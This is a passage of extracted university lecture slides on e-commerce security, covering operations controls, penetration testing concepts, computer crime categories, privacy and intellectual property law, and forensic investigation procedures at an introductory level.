• Hardware Maintenance– Requires physical and logical access by support and vendors– Supervision of vendors and maintenance, background checks
• Maintenance Accounts– Disable maintenance accounts when not needed– Rename default passwords
• Diagnostic Port Control– Specific ports for maintenance– Should be blocked from external access
• Hardware Physical Controls – require locks and alarms– Sensitive operator terminals– Media storage rooms– Server and communications equipment– Modem pools and circuit rooms
![Page 133: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/133.jpg)
ITEC5611
S. Kungpisdan133
Software Controls
• Anti-virus Management – prevent download of viruses
• Software Testing – formal rigid software testing process
• Software Utilities – control of powerful utilities• Safe software Storage – prevent modification of
software and copies of backups• Back up Controls – test and restore backups
![Page 134: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/134.jpg)
ITEC5611
S. Kungpisdan134
Physical Protection
• Protection from physical access– Hardware – routers, firewalls, computers, printers– Software – libraries, vendor software, OS software
• Physical piggybacking – following an authorized person through a door
![Page 135: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/135.jpg)
ITEC5611
S. Kungpisdan135
Monitoring and Audits
• Monitoring – problem identification and resolution
• Monitor for:– Illegal Software Installation– Hardware Faults– Error States– Operational Events
![Page 136: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/136.jpg)
ITEC5611
S. Kungpisdan136
Penetration Testing
• Testing a networks defenses by using the same techniques as external intruders– Scanning and Probing – port scanners– Demon Dialing – war dialing for modems– Sniffing – capture data packets– Dumpster Diving – searching paper disposal areas– Social Engineering – most common, get information
by asking
![Page 137: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/137.jpg)
ITEC5611
S. Kungpisdan137
Auditing
• IT Auditors Audit:– Backup Controls– System and Transaction Controls– Data Library Controls– Systems Development Standards– Data Center Security– Contingency Plans
![Page 138: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/138.jpg)
ITEC5611
S. Kungpisdan138
Audit Trails
• Enables tracking of history of modifications, deletions, additions.
• Allow for accountability• Audit logs should record:
– Transaction time and date– Who processed transaction– Which terminal was used– Various security events relating to transaction
![Page 139: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/139.jpg)
ITEC5611
S. Kungpisdan139
Illegal Computer Operations
• Eavesdropping – sniffing, dumpster diving, social engineering
• Fraud – collusion, falsified transactions• Theft – information or trade secrets, physical
hardware and software theft• Sabotage – Denial of Service (DoS), production
delays• External Attacks – malicious cracking, scanning,
war dialing
![Page 140: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/140.jpg)
ITEC5611
S. Kungpisdan140
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
![Page 141: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/141.jpg)
ITEC5611
S. Kungpisdan141
Computer Crimes
• Crimes against the computer
• Crimes using a computer
![Page 142: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/142.jpg)
ITEC5611
S. Kungpisdan142
Most Common Crimes
• Denial of Service (DoS)• Theft or passwords • Network Intrusions• Emanation Eavesdropping• Social Engineering• Illegal Content of Material -
porn• Fraud – using computer to
perpetuate crimes, i.e. auctions of non-existent merchandise
• Software Piracy• Dumpster Diving• Malicious Code• Spoofing of IP Addresses
• Information Warfare – attacking infrastructure of a Nation, including military and power grid
• Destruction or alteration of information
• Use of readily available Attack Scripts – Script Kiddies, unskilled users
• Masquerading• Embezzlement – Illegally
acquiring funds• Data-Diddling – modification of
data• Terrorism
![Page 143: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/143.jpg)
ITEC5611
S. Kungpisdan143
Intellectual Property Law
• Patent – Provides owner legally enforceable right to exclude others for specified time (U.S. 17 years)
• Copyright – Protects original works of authorship, can be used for software and databases
• Trade Secret – Secures confidentiality of proprietary technical and business related information– Company must meet requirements:
• Invested resources to develop the information• Valuable to the business• Valuable to competitor• Non-obvious information
• Trademark – establishes word, name, symbol, color or sounds used to identify and distinguish goods
![Page 144: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/144.jpg)
ITEC5611
S. Kungpisdan144
Information Privacy Laws
• Intent varies widely from country to country• European Union - has developed more
protective laws for individual privacy– Transfer of data from EU to US is prohibited unless
equivalent protections are in place
![Page 145: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/145.jpg)
ITEC5611
S. Kungpisdan145
Electronic Monitoring
• Keystroke monitoring, e-mail monitoring, surveillance cameras, badges and magnetic card keys all allow monitoring of individuals.
• Key to monitoring: Must be done in a lawful manner in a consistent fashion
![Page 146: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/146.jpg)
ITEC5611
S. Kungpisdan146
E-mail monitoring
• Inform users that all e-mail is being monitored by displaying log-on banner– Banner should state: logging on to system consents
user to being monitored. Unauthorized access is prohibited. Subject to prosecution.
• Ensure monitoring is uniformly applied• Explain acceptable use• Explain who can read e-mail and how long it is
backed up• No guarantee of privacy
![Page 147: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/147.jpg)
ITEC5611
S. Kungpisdan147
Computer Forensics
• Collecting information from and about computer systems that is admissible in a court of law.
![Page 148: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/148.jpg)
ITEC5611
S. Kungpisdan148
Evidence Life Cycle
• Discovery and recognition• Protection• Recording• Collection
– Collect all relevant storage media– Make image of hard disk before removing power– Print out screen– Avoid degaussing equipment
• Identification (tagging and marking)• Preservation
– Protect from magnetic erasure– Store in proper environment
• Transportation• Presentation in court• Return to evidence owner
![Page 149: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/149.jpg)
ITEC5611
S. Kungpisdan149
Conducting the Investigation
• Corporate investigation should include Management, corporate security, Human Resources, legal department and other appropriate staff.
• Committee should be set up before hand to address the following issues:– Establishing liaison with law enforcement– Deciding when and if to bring in law enforcement (FBI and
Secret Service)– Setting up means of reporting computer crimes– Establishing procedures for handling reports of computer crimes– Planning and conducting investigations– Involving senior management and corporate security, Human
Resources, the legal dept.– Ensuring proper collection of evidence
![Page 150: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/150.jpg)
ITEC5611
S. Kungpisdan150
Good Sources of Evidence
• Telephone records• Video cameras• Audit trails• System logs• System backups• Witnesses• Results of surveillance• E-mails
![Page 151: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/151.jpg)
ITEC5611
S. Kungpisdan151
MOM
• Motive
• Opportunity
• Means
![Page 152: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/152.jpg)
ITEC5611
S. Kungpisdan152
Interview
• If interviewing do not give information away to suspect
• Questions should be scripted
• Don’t use original documents in the interview
![Page 153: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/153.jpg)
Questions?